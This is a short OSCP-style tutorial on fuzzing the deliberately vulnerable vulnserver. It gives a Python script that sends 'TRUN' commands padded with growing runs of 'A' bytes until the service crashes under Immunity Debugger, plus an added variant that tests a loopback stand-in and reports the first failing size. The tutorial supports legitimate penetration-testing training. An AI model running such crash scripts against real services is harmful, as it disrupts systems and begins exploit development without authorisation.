OSCP Security Technology - Fuzzing

Download vulnserver from The Grey Corner website.

https://thegreycorner.com/vulnserver.html

Download Immunity Debugger from here.

https://www.immunityinc.com/products/debugger/

Connect from Kali to vulnserver with netcat:

nc -nv 192.168.2.21 9999

Create and run the fuzzer script.

nano fuzzer.py
chmod 777 fuzzer.py
./fuzzer.py

fuzzer.py:

#!/usr/bin/python3
import socket

# Build test strings of increasing length: 1, 100, 300, 500, ... bytes
buffer = [b"A"]
counter = 100
while len(buffer) <= 30:
    buffer.append(b"A" * counter)
    counter = counter + 200

for string in buffer:
    print("Fuzzing vulnserver with %s bytes" % len(string))
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('192.168.2.21', 9999))
    # Send the TRUN command followed by the test string
    s.send(b'TRUN /.:/' + string)
    s.close()

Vulnserver has now crashed.

Debug and watch what will happen.

Install and open Immunity Debugger.

Attach the debugger to the vulnserver process.

Run the debugger.

Run the fuzzer.py script on Kali Linux again.

Vulnserver has crashed and the debugger is paused.
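
The fuzzer.py script keeps sending after the service has gone down and never reports which size caused the failure. As an added example (not from the original post), the loop below stops at the first unanswered request and returns the last size that worked and the first that failed. So that it runs offline it targets a constructed loopback stand-in; the 2000-byte limit, the banner and the newline framing are assumptions, not vulnserver's behaviour.

```python
import socket
import threading

LIMIT = 2000  # constructed: the stand-in goes down on requests above this size

def stand_in_server(listener):
    """Constructed target: answers requests until one exceeds LIMIT, then stops."""
    while True:
        conn, _ = listener.accept()
        with conn:
            conn.sendall(b"Welcome\n")            # assumed banner
            data = b""
            while not data.endswith(b"\n"):       # assumed newline framing
                chunk = conn.recv(65536)
                if not chunk:
                    break
                data += chunk
            if len(data) > LIMIT:
                listener.close()                  # simulate the process dying
                return
            conn.sendall(b"TRUN COMPLETE\n")

def fuzz(host, port, sizes, timeout=2.0):
    """Return (last_ok_size, first_failing_size); the latter is None if all pass."""
    last_ok = None
    for size in sizes:
        try:
            with socket.create_connection((host, port), timeout=timeout) as s:
                s.recv(1024)                      # read the banner
                s.sendall(b"TRUN /.:/" + b"A" * size + b"\n")
                if not s.recv(1024):              # closed without a reply
                    return last_ok, size
        except OSError:                           # refused, reset or timed out
            return last_ok, size
        last_ok = size
    return last_ok, None

def demo():
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))               # loopback only, free port
    listener.listen(1)
    port = listener.getsockname()[1]
    threading.Thread(target=stand_in_server, args=(listener,), daemon=True).start()
    sizes = [1] + [100 + 200 * i for i in range(30)]  # same sizes as fuzzer.py
    return fuzz("127.0.0.1", port, sizes)

if __name__ == "__main__":
    print(demo())
```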
